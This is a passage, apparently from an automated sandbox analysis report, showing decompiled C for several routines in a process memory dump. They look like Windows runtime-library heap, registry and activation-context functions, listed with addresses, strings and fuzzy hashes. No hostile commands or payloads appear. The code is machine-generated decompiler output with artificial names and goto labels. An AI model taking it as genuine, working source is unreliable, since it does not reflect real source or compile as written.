						E034EA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E034EA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x3518b04 >> 0x14) + (_v44 -  *0x3518b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E03447D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E034E138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E03447D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E034DFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x3518724 & 0x00000008) != 0) {
						E034E52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E034F15B5(0x3518ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x034f0eb7
0x034f0eb9
0x034f0ec0
0x034f0ec2
0x034f0ecd
0x034f105b
0x034f105b
0x034f1061
0x034f1066
0x034f1066
0x034f106b
0x034f1073
0x034f1073
0x034f0ed3
0x034f0ed6
0x034f0edc
0x034f0ee0
0x034f0ee7
0x034f0ef0
0x034f0ef5
0x034f0efa
0x034f0efc
0x034f0efd
0x034f0f03
0x034f0f04
0x034f0f06
0x034f0f07
0x034f0f09
0x034f0f0e
0x034f0f14
0x034f0f23
0x034f0f2d
0x034f0f34
0x034f0f34
0x034f0f14
0x034f0f52
0x00000000
0x00000000
0x034f0f58
0x034f0f73
0x034f0f74
0x034f0f79
0x034f0f7d
0x034f0f80
0x034f0f86
0x034f0fab
0x034f0fb5
0x034f0fc6
0x034f0fd1
0x034f0fe3
0x034f0fd3
0x034f0fdc
0x034f0fdc
0x034f0feb
0x034f1009
0x034f1009
0x034f1015
0x034f1027
0x034f1017
0x034f1020
0x034f1020
0x034f102f
0x034f103c
0x034f103c
0x034f1048
0x034f1050
0x034f1050
0x034f1055
0x00000000
0x034f1055
0x034f0f88
0x034f0f9e
0x034f0fa2
0x034f0fa9
0x00000000
0x00000000
0x00000000
0x034f0fa9
0x00000000

Strings

`, xrefs: 034F0F16

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: fb34bfdf0aa311ca66140d100bf1d92726745aef7a0d8b418fbffa6f1078ef55
Instruction ID: 95577dd0e90496431281b561300b82e76e664e518d9630abbe965ba79646816e
Opcode Fuzzy Hash: fb34bfdf0aa311ca66140d100bf1d92726745aef7a0d8b418fbffa6f1078ef55
Instruction Fuzzy Hash: E751AF712043419FD324DF2AD980B1BB7E5EBC4704F08092EFA969F691D771E806CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0345F0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0345F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E03444120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E03469830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E03469990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E034695D0();
							goto L11;
						} else {
							_t18 = _t82 + 0x18; // 0xc036b01a
							_t109 = L03444620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								_t29 =  &(_t103[2]); // 0x2000c036
								E0346F3E0(_t21,  *_t29,  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t34 =  &(_t103[2]); // 0x2000c036
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E034695D0();
										L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x0345f0d3
0x0345f0d9
0x0345f0e0
0x0345f0e7
0x0345f0f2
0x0345f0f4
0x0345f0f8
0x0345f100
0x0345f108
0x0345f10d
0x0345f115
0x0345f116
0x0345f11f
0x0345f123
0x0345f124
0x0345f12c
0x0345f130
0x0345f134
0x0345f13d
0x0345f144
0x0345f14b
0x0345f152
0x0349bab0
0x0349bab0
0x0345f158
0x0345f158
0x0345f15a
0x0345f160
0x0345f165
0x0345f166
0x0345f16f
0x0345f173
0x0349baa7
0x0349baa7
0x0349baab
0x00000000
0x0345f179
0x0345f179
0x0345f18d
0x0345f191
0x0349baa2
0x00000000
0x0345f197
0x0345f19b
0x0345f1a2
0x0345f1a9
0x0345f1af
0x0345f1b2
0x0345f1b6
0x0345f1b9
0x0345f1c0
0x0345f1c4
0x0345f1d8
0x0345f1df
0x0345f1e3
0x0345f1e6
0x0345f1eb
0x0345f1ee
0x0345f1f4
0x0345f20f
0x0349bab7
0x0349babb
0x0349bacc
0x0349bad1
0x0345f215
0x0345f218
0x0345f226
0x0345f22b
0x00000000
0x0345f22b
0x0345f1f6
0x0345f1f6
0x0345f1f9
0x0345f1fb
0x0345f1fb
0x0345f1f4
0x0345f191
0x0345f173
0x0345f152
0x0345f203

Strings

@, xrefs: 0345F124

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 8bfd77ec182f2dcea7f9116d76bc98e18409498d9887a8526976b2f900924500
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 50518D755047109FD320DF19C840A6BBBF8FF48710F00892EF9A59B690E7B4E904CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 034A3540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E034A3540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x351d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E03460BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E034A3706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0346FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E034A3540;
						E0346FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0347DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E034B0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E034697C0();
					}
					return E0346B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E034A3971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E034A3884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0346FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E03469650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E034A3787(_a4,  &_v352, _t80);
						}
					}
					L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E034695D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x034a3552
0x034a355a
0x034a355d
0x034a3566
0x034a3567
0x034a357e
0x034a358f
0x034a35a1
0x034a35a5
0x034a366b
0x034a366b
0x034a366d
0x034a3672
0x034a3679
0x034a3685
0x034a368d
0x034a369d
0x034a36a7
0x034a36b8
0x034a36c6
0x034a36c7
0x034a36dc
0x034a36e1
0x034a36e7
0x034a36e9
0x034a36e9
0x034a3703
0x034a3703
0x034a35b5
0x034a35c0
0x034a35c4
0x00000000
0x00000000
0x034a35ca
0x034a35d7
0x034a35e2
0x034a35e6
0x034a35e8
0x034a35f5
0x034a35fa
0x034a3603
0x034a3604
0x034a3609
0x034a360a
0x034a3612
0x034a3613
0x034a361e
0x034a3622
0x034a3628
0x034a362f
0x034a362f
0x034a3636
0x034a3638
0x034a363b
0x034a3642
0x034a3642
0x034a3636
0x034a3657
0x034a3657
0x034a365c
0x034a3662
0x034a3669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 034A358F

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: BinaryHash
API String ID: 2994545307-2202222882
Opcode ID: adc2840ceb1d1260690d4608d2730c7888e5e6fcaa0d41a40bd4aa6a265250aa
Instruction ID: af74c36c8905a3188fcedbfa540fbafc4e9fb2e395129f35c8ab682422da2703
Opcode Fuzzy Hash: adc2840ceb1d1260690d4608d2730c7888e5e6fcaa0d41a40bd4aa6a265250aa
Instruction Fuzzy Hash: CD4134B5D0062C9FDB61DE55CC80FDEB77CAB54714F0045AAE609AF250EB309E888F99

Uniqueness

Uniqueness Score: -1.00%

Function 034F05AC, Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E034F05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E034F07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E03469730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E034EA80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E034EA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E034F1293(_t79, _v40, E034F07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E03447D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E034E138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x034f05c5
0x034f05ca
0x034f05d3
0x034f06db
0x034f06db
0x034f06dd
0x034f06e3
0x034f06e3
0x034f05dd
0x034f05e7
0x034f05f6
0x034f0600
0x034f0607
0x034f0610
0x034f0615
0x034f061a
0x034f061c
0x034f061e
0x034f0624
0x034f0625
0x034f0627
0x034f0628
0x034f0631
0x034f0640
0x034f064d
0x034f0654
0x034f0654
0x034f0631
0x034f066d
0x034f0674
0x00000000
0x00000000
0x034f0692
0x034f069e
0x034f06b0
0x034f06a0
0x034f06a9
0x034f06a9
0x034f06b8
0x034f06d6
0x034f06d6
0x00000000

Strings

`, xrefs: 034F0633

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: c7bd458053570acda583ff3b13b5a5b7bdf9dc5c9770bea4e20aee6db6596a8c
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: C031E032600345AFE720DE25CC84F9BBBD9ABC4754F08422AFA589F291D770E904CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 034A3884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E034A3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E03469650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L03444620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E03469650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x034a3893
0x034a3896
0x034a3899
0x034a389f
0x034a38a0
0x034a38a4
0x034a38a9
0x034a38ac
0x034a38ad
0x034a38ae
0x034a38af
0x034a38b1
0x034a38b4
0x034a38bb
0x034a38bc
0x034a38bd
0x034a38c4
0x034a38c8
0x034a38ca
0x034a38ca
0x034a38d5
0x034a393e
0x034a3940
0x034a3942
0x034a3952
0x034a3954
0x034a3961
0x034a3961
0x034a3967
0x034a396e
0x034a396e
0x034a3947
0x034a394c
0x00000000
0x034a394c
0x034a38ea
0x034a38ee
0x034a38f8
0x034a38f9
0x034a38ff
0x034a3900
0x034a3902
0x034a3903
0x034a390b
0x034a390f
0x034a3950
0x00000000
0x034a3950
0x034a3915
0x034a391d
0x034a391d
0x034a3922
0x034a3926
0x00000000
0x034a3928
0x034a392b
0x034a392b
0x034a3935
0x034a3937
0x034a3937
0x00000000
0x034a3935
0x034a3926
0x034a38f0
0x00000000

Strings

BinaryName, xrefs: 034A38B4

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: BinaryName
API String ID: 2994545307-215506332
Opcode ID: c3ba5eee06ea6cea393076a42949df34670db88a7289951396a6b94f2bfe5250
Instruction ID: 2809d1b8c532bf47260d6528591e4f30ee8968c967f985ff4d76f2199866fe44
Opcode Fuzzy Hash: c3ba5eee06ea6cea393076a42949df34670db88a7289951396a6b94f2bfe5250
Instruction Fuzzy Hash: CE31053AD04A19AFDB15DE5DC945E6BF778EB90B20F01416AE914AF390E7309E04CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0345D294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E0345D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x351d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E03444120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0346B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E034698D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E034695D0();
					L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x0345d29c
0x0345d2a6
0x0345d2b1
0x0345d2b5
0x0345d2b6
0x0345d2bc
0x0345d2bd
0x0345d2be
0x0345d2bf
0x0345d2c2
0x0345d2c4
0x0345d2cc
0x0345d384
0x0345d34b
0x0345d34f
0x0345d350
0x0345d351
0x0345d35c
0x0345d35c
0x0345d2d6
0x0345d2da
0x0345d2e1
0x0345d361
0x0345d369
0x0345d36d
0x0345d2e3
0x0345d2e3
0x0345d2e3
0x0345d2e5
0x0345d2ed
0x0345d2f5
0x0345d2fa
0x0345d302
0x0345d303
0x0345d30b
0x0345d30f
0x0345d313
0x0345d318
0x0345d31c
0x0345d320
0x0345d379
0x0345d37d
0x00000000
0x00000000
0x0349affe
0x0349b001
0x0349b011
0x00000000
0x0345d322
0x0345d322
0x0345d330
0x0345d337
0x0345d35d
0x0345d339
0x0345d33f
0x0345d38c
0x0345d38c
0x0345d33f
0x0345d349
0x00000000
0x0345d349

Strings

@, xrefs: 0345D303

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 6ec3cf95acdb19fed6e6b883da304873d42dc9a3a4944707c28f40ac55ed6b89
Instruction ID: 4618f1a029bbaeb447b3cef3ef4646b26fa9ac5ba023f3a8897f9eb9aeedceec
Opcode Fuzzy Hash: 6ec3cf95acdb19fed6e6b883da304873d42dc9a3a4944707c28f40ac55ed6b89
Instruction Fuzzy Hash: 8B31CFB5D083009FC710DF29C98096BBBE8EF96654F04092FF9948B211D634DD09CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 03431B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E03431B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0346BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0346A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0346A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L03444620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x03431b8f
0x03431b9a
0x03431b9c
0x03431b9e
0x03431ba3
0x03487010
0x03487010
0x00000000
0x03431ba9
0x03431ba9
0x03431bae
0x00000000
0x03431bc5
0x03431bca
0x03431bcf
0x03431bd0
0x03431bd1
0x03431bd2
0x03431bd6
0x03431bdc
0x03431be0
0x03486ffc
0x03487000
0x00000000
0x03487006
0x03487009
0x03487009
0x03431be6
0x03431bec
0x03431c0b
0x03431c0b
0x03431c0c
0x03431c11
0x03431c12
0x03431c15
0x03431c1b
0x03431c1f
0x03431c31
0x03431c33
0x03487026
0x03487026
0x03431c21
0x03431c24
0x03431c24
0x03431bee
0x03431bee
0x03431bf2
0x03431c3a
0x03431bf4
0x03431bf4
0x03431c05
0x03431c05
0x03431c09
0x03431c3e
0x00000000
0x00000000
0x00000000
0x03431c09
0x03431bec
0x03431be0
0x03431bae
0x03431c2e

Strings

WindowsExcludedProcs, xrefs: 03431BC5

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: 4618f87a4b39547e1a801a1027472bd1d3948d0d66c03b0aabc8f5bd960d87a9
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 9C21F576500228ABDB21FE56C940F5FBBADEF4AA50F294467FD149F300D634DC0297A8

Uniqueness

Uniqueness Score: -1.00%

Function 0344F716, Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0344F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
